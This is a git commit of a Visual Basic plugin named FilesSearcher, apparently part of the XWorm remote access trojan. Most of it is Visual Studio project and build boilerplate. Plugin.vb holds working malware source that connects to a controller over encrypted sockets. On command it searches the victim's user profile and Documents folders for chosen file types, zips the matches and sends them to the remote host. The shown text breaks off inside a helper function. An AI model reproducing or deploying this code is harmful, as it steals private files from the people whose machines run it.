initial commit

This commit is contained in:
i2p
2026-08-27 11:22:34 -06:00
commit 5983c713b1
2676 changed files with 529190 additions and 0 deletions
Binary file not shown.
Binary file not shown.
+25
View File
@@ -0,0 +1,25 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.33027.164
MinimumVisualStudioVersion = 10.0.40219.1
Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "FilesSearcher", "FilesSearcher\FilesSearcher.vbproj", "{48F89FFB-3039-4340-B165-29A4975C13F0}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{48F89FFB-3039-4340-B165-29A4975C13F0}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{48F89FFB-3039-4340-B165-29A4975C13F0}.Debug|Any CPU.Build.0 = Debug|Any CPU
{48F89FFB-3039-4340-B165-29A4975C13F0}.Release|Any CPU.ActiveCfg = Release|Any CPU
{48F89FFB-3039-4340-B165-29A4975C13F0}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {BB75D69B-936B-458E-8C40-3A5652B383C4}
EndGlobalSection
EndGlobal
@@ -0,0 +1 @@
{"RootPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\Plugins\\FilesSearcher\\FilesSearcher","ProjectFileName":"FilesSearcher.vbproj","Configuration":"Debug|AnyCPU","FrameworkPath":"","Sources":[],"References":[],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\byt3d4sh\\Desktop\\Projects\\XWorm V6.5\\XWorm\\bin\\Debug\\Plugins\\FilesSearcher.dll","OutputItemRelativePath":"FilesSearcher.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}
@@ -0,0 +1,129 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{48F89FFB-3039-4340-B165-29A4975C13F0}</ProjectGuid>
<OutputType>Library</OutputType>
<RootNamespace>FilesSearcher</RootNamespace>
<AssemblyName>FilesSearcher</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>Windows</MyType>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
<TargetFrameworkProfile />
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>false</DebugSymbols>
<DebugType>none</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>..\..\..\XWorm\bin\Debug\Plugins\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>
</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<OptionExplicit>On</OptionExplicit>
</PropertyGroup>
<PropertyGroup>
<OptionCompare>Binary</OptionCompare>
</PropertyGroup>
<PropertyGroup>
<OptionStrict>Off</OptionStrict>
</PropertyGroup>
<PropertyGroup>
<OptionInfer>On</OptionInfer>
</PropertyGroup>
<ItemGroup>
<Reference Include="DotNetZip">
<HintPath>..\DotNetZip.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Diagnostics" />
<Import Include="System.Linq" />
<Import Include="System.Xml.Linq" />
</ItemGroup>
<ItemGroup>
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<Compile Include="My Project\Resources.Designer.vb">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="My Project\Settings.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
<Compile Include="Plugin.vb" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="My Project\Resources.resx">
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
<CustomToolNamespace>My.Resources</CustomToolNamespace>
<SubType>Designer</SubType>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
<None Include="My Project\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<CustomToolNamespace>My</CustomToolNamespace>
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
</None>
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>
@@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>
@@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction
@@ -0,0 +1,13 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
@@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<MyApplicationData xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<MySubMain>false</MySubMain>
<SingleInstance>false</SingleInstance>
<ShutdownMode>0</ShutdownMode>
<EnableVisualStyles>true</EnableVisualStyles>
<AuthenticationMode>0</AuthenticationMode>
<ApplicationType>1</ApplicationType>
<SaveMySettingsOnExit>true</SaveMySettingsOnExit>
</MyApplicationData>
@@ -0,0 +1,35 @@
Imports System
Imports System.Reflection
Imports System.Runtime.InteropServices
' General Information about an assembly is controlled through the following
' set of attributes. Change these attribute values to modify the information
' associated with an assembly.
' Review the values of the assembly attributes
<Assembly: AssemblyTitle("FilesSearcher")>
<Assembly: AssemblyDescription("")>
<Assembly: AssemblyCompany("")>
<Assembly: AssemblyProduct("FilesSearcher")>
<Assembly: AssemblyCopyright("Copyright © 2024")>
<Assembly: AssemblyTrademark("")>
<Assembly: ComVisible(False)>
'The following GUID is for the ID of the typelib if this project is exposed to COM
<Assembly: Guid("c1854534-d4ba-46f8-aa51-140f96179faf")>
' Version information for an assembly consists of the following four values:
'
' Major Version
' Minor Version
' Build Number
' Revision
'
' You can specify all the values or you can default the Build and Revision Numbers
' by using the '*' as shown below:
' <Assembly: AssemblyVersion("1.0.*")>
<Assembly: AssemblyVersion("1.0.0.0")>
<Assembly: AssemblyFileVersion("1.0.0.0")>
@@ -0,0 +1,63 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Imports System
Namespace My.Resources
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("FilesSearcher.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set
resourceCulture = value
End Set
End Property
End Module
End Namespace
@@ -0,0 +1,117 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,73 @@
'------------------------------------------------------------------------------
' <auto-generated>
' This code was generated by a tool.
' Runtime Version:4.0.30319.42000
'
' Changes to this file may cause incorrect behavior and will be lost if
' the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Namespace My
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Partial Friend NotInheritable Class MySettings
Inherits Global.System.Configuration.ApplicationSettingsBase
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
#Region "My.Settings Auto-Save Functionality"
#If _MyType = "WindowsForms" Then
Private Shared addedHandler As Boolean
Private Shared addedHandlerLockObject As New Object
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
If My.Application.SaveMySettingsOnExit Then
My.Settings.Save()
End If
End Sub
#End If
#End Region
Public Shared ReadOnly Property [Default]() As MySettings
Get
#If _MyType = "WindowsForms" Then
If Not addedHandler Then
SyncLock addedHandlerLockObject
If Not addedHandler Then
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
addedHandler = True
End If
End SyncLock
End If
#End If
Return defaultInstance
End Get
End Property
End Class
End Namespace
Namespace My
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
Friend Module MySettingsProperty
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
Friend ReadOnly Property Settings() As Global.FilesSearcher.My.MySettings
Get
Return Global.FilesSearcher.My.MySettings.Default
End Get
End Property
End Module
End Namespace
@@ -0,0 +1,7 @@
<?xml version='1.0' encoding='utf-8'?>
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
<Profiles>
<Profile Name="(Default)" />
</Profiles>
<Settings />
</SettingsFile>
@@ -0,0 +1,404 @@
Imports System.IO
Imports System.IO.Compression
Imports System.Net.Sockets
Imports System.Security.Cryptography
Imports System.Threading
Imports Ionic.Zip
Public Class Plugin
Public Shared T1 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.BeginConnect))
Public Shared T2 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.Ping))
Public Shared Function Run(ByVal H As String, ByVal P As String, ByVal SL As String, ByVal K As String, ByVal id As String)
Try
Settings.Host = H
Settings.Port = P
Settings.SPL = SL
Settings.KEY = K
Settings.IDD = id
T1.Start()
T2.Start()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Function
End Class
Public Class Settings
Public Shared Host As String
Public Shared Port As String
Public Shared KEY As String
Public Shared SPL As String
Public Shared IDD As String
End Class
Public Class ClientSocket
Public Shared isConnected As Boolean = False
Public Shared S As Socket
Public Shared BufferLength As Long = Nothing
Public Shared Buffer() As Byte
Public Shared MS As New MemoryStream
Public Shared Sub BeginConnect()
S = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
BufferLength = -1
Buffer = New Byte(0) {}
MS = New MemoryStream
S.ReceiveBufferSize = 50 * 1024
S.SendBufferSize = 50 * 1024
Try
S.Connect(Settings.Host, Settings.Port)
isConnected = True
ClientSocket.Send("FilesSearcher" & Settings.SPL & Settings.IDD)
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Catch ex As Exception
isDisconnected()
End Try
End Sub
Public Shared Sub BeginReceive(ByVal ar As IAsyncResult)
If isConnected = False Then isDisconnected()
Try
Dim Received As Integer = S.EndReceive(ar)
If Received > 0 Then
If BufferLength = -1 Then
If Buffer(0) = 0 Then
BufferLength = BS(MS.ToArray)
MS.Dispose()
MS = New MemoryStream
If BufferLength = 0 Then
BufferLength = -1
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Exit Sub
End If
Buffer = New Byte(BufferLength - 1) {}
Else
MS.WriteByte(Buffer(0))
End If
Else
MS.Write(Buffer, 0, Received)
If (MS.Length = BufferLength) Then
Dim thread = New Thread(AddressOf BeginRead)
thread.Start(MS.ToArray)
BufferLength = -1
MS.Dispose()
MS = New MemoryStream
Buffer = New Byte(0) {}
Else
Buffer = New Byte(BufferLength - MS.Length - 1) {}
End If
End If
Else
isDisconnected()
Exit Sub
End If
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
Catch ex As Exception
isDisconnected()
Exit Sub
End Try
End Sub
Public Shared Sub BeginRead(ByVal b As Byte())
Try
Messages.Read(b)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub Send(ByVal msg As String)
Try
Using MS As New MemoryStream
Dim B As Byte() = AES_Encryptor(SB(msg))
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
MS.Write(L, 0, L.Length)
MS.Write(B, 0, B.Length)
S.Poll(-1, SelectMode.SelectWrite)
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
End Using
Catch ex As Exception
isDisconnected()
End Try
End Sub
Public Shared Sub isDisconnected()
isConnected = False
Try
S.Close()
S.Dispose()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
MS.Close()
MS.Dispose()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
Plugin.T1.Abort()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Try
Plugin.T2.Abort()
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub Ping()
While True
Threading.Thread.Sleep(30 * 1000)
Try
If S.Connected Then
Using MS As New MemoryStream
Dim B As Byte() = AES_Encryptor(SB("PING?"))
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
MS.Write(L, 0, L.Length)
MS.Write(B, 0, B.Length)
S.Poll(-1, SelectMode.SelectWrite)
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
GC.Collect()
End Using
End If
Catch ex As Exception
isDisconnected()
End Try
End While
End Sub
End Class
Public Class Messages
Public Shared Sub Read(ByVal b As Byte())
Try
Dim A As String() = Split(BS(AES_Decryptor(b)), Settings.SPL)
Select Case A(0)
Case "CloseFilesSearcher"
ClientSocket.isDisconnected()
Case "StartFilesSearcher"
Extensions.Clear()
SizeLimit = Convert.ToUInt32(A(1))
ZipName = String.Concat(New String() {Path.GetTempPath(), DateTime.Now.ToString("MM-dd-yyyy_HH-mm-ss"), ".zip"})
For Each ex In Strings.Split(A(2), ("-=>"))
If Not ex = Nothing Then
Extensions.Add(ex)
End If
Next
SendMSG("Searching..")
Search()
End Select
Catch ex As Exception
SendError(ex.Message)
End Try
End Sub
Public Shared Sub SendError(ByVal msg As String)
Try
ClientSocket.Send("FilesSearcherErr" & Settings.SPL & Settings.IDD & Settings.SPL & msg)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub SendMSG(ByVal msg As String)
Try
ClientSocket.Send("FilesSearcherMSG" & Settings.SPL & Settings.IDD & Settings.SPL & msg)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared Sub Search()
On Error Resume Next
Dim list As List(Of String) = New List(Of String)()
For Each ifilesinfo As String In inonly(Environ$("USERPROFILE"), ".*")
If Not ifilesinfo = Nothing Then
If New FileInfo(ifilesinfo).Length <= CLng(SizeLimit) AndAlso Extensions.Contains(Path.GetExtension(ifilesinfo.ToLower())) Then
If Not list.Contains(ifilesinfo) Then
list.Add(ifilesinfo)
End If
End If
End If
Next
For Each Dir As String In Directory.GetDirectories((Environ$("USERPROFILE")))
For Each ifilesinfo As String In outonly(Dir, ".*")
If Not ifilesinfo = Nothing Then
If New FileInfo(ifilesinfo).Length <= CLng(SizeLimit) AndAlso Extensions.Contains(Path.GetExtension(ifilesinfo.ToLower())) Then
If Not list.Contains(ifilesinfo) Then
list.Add(ifilesinfo)
End If
End If
End If
Next
Next
For Each ifilesinfo As String In inonly(Environ$("USERPROFILE") & "\Documents", ".*")
If Not ifilesinfo = Nothing Then
If New FileInfo(ifilesinfo).Length <= CLng(SizeLimit) AndAlso Extensions.Contains(Path.GetExtension(ifilesinfo.ToLower())) Then
If Not list.Contains(ifilesinfo) Then
list.Add(ifilesinfo)
End If
End If
End If
Next
For Each Dir As String In Directory.GetDirectories((Environ$("USERPROFILE") & "\Documents"))
For Each ifilesinfo As String In outonly(Dir, ".*")
If Not ifilesinfo = Nothing Then
If New FileInfo(ifilesinfo).Length <= CLng(SizeLimit) AndAlso Extensions.Contains(Path.GetExtension(ifilesinfo.ToLower())) Then
If Not list.Contains(ifilesinfo) Then
list.Add(ifilesinfo)
End If
End If
End If
Next
Next
If list.Count <> 0 Then
SendMSG("Found [" & list.Count & "]")
Save(list)
Else
SendError("No Files Found!")
End If
End Sub
Public Shared Function outonly(ruta As String, mExtesiones As String)
Return (From ifilesinfo In IO.Directory.GetFiles(ruta, "*" & mExtesiones, IO.SearchOption.AllDirectories))
End Function
Public Shared Function inonly(ruta As String, mExtesiones As String)
Return (From ifilesinfo In IO.Directory.GetFiles(ruta, "*" & mExtesiones))
End Function
Public Shared Sub Save(ByVal files As List(Of String))
Try
If File.Exists(ZipName) Then File.Delete(ZipName)
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
Thread.Sleep(1000)
Try
Using zipFile As ZipFile = New ZipFile()
zipFile.CompressionLevel = Ionic.Zlib.CompressionLevel.BestCompression
SendMSG("ZipFiles..")
For Each current As String In files
zipFile.AddFile(current)
GC.Collect()
Next
zipFile.Save(ZipName)
End Using
Catch ex As Exception
SendError(ex.Message)
End Try
If ClientSocket.isConnected Then
If IO.File.Exists(ZipName) Then
SendMSG("Receiving..")
ClientSocket.Send("ZipGet" & Settings.SPL & Settings.IDD & Settings.SPL & IO.Path.GetFileName(ZipName) & Settings.SPL & Convert.ToBase64String(Compress(IO.File.ReadAllBytes(ZipName))))
End If
Else
SendError("Zip Not Exists!")
End If
Try
If IO.File.Exists(ZipName) Then
IO.File.Delete(ZipName)
End If
Catch ex As Exception
Debug.WriteLine(ex.Message)
End Try
End Sub
Public Shared ZipName As String
Public Shared SizeLimit As Integer
Public Shared Extensions As New List(Of String)
End Class
Module Helper
Function Decompress(ByVal input As Byte()) As Byte()
Using source = New MemoryStream(input)
Dim lengthBytes As Byte() = New Byte(3) {}
source.Read(lengthBytes, 0, 4)
Dim length = BitConverter.ToInt32(lengthBytes, 0)
Using decompressionStream = New GZipStream(source, CompressionMode.Decompress)
Dim result = New Byte(length - 1) {}
decompressionStream.Read(result, 0, length)
Return result
End Using
